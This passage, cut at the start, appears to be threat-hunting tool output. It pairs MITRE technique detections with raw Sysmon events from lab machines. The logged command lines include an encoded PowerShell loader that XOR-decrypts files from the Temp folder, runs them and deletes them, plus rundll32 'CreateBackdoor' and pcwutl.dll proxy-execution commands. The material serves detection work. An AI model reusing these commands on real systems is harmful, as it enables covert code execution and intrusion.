AkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:28:42.711005Z"">
</TimeCreated>
<EventRecordID>5875</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:28:42.700</Data>
<Data Name=""ProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ProcessId"">2584</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3251-5CEB-0000-00109E06E100</Data>
<Data Name=""ParentProcessId"">748</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.234543Z"">
</TimeCreated>
<EventRecordID>243544</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.077</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010476F2000</Data>
<Data Name=""ProcessId"">7836</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:09:02.275164Z"">
</TimeCreated>
<EventRecordID>16507</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:09:02.275</Data>
<Data Name=""ProcessGuid"">365ABB72-532E-5CD8-0000-00106C222700</Data>
<Data Name=""ProcessId"">1528</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
<Data Name=""ParentProcessId"">3788</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:13.650211Z"">
</TimeCreated>
<EventRecordID>20</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:13.560</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Hid User Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:28:42.711005Z"">
</TimeCreated>
<EventRecordID>5875</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:28:42.700</Data>
<Data Name=""ProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ProcessId"">2584</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3251-5CEB-0000-00109E06E100</Data>
<Data Name=""ParentProcessId"">748</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
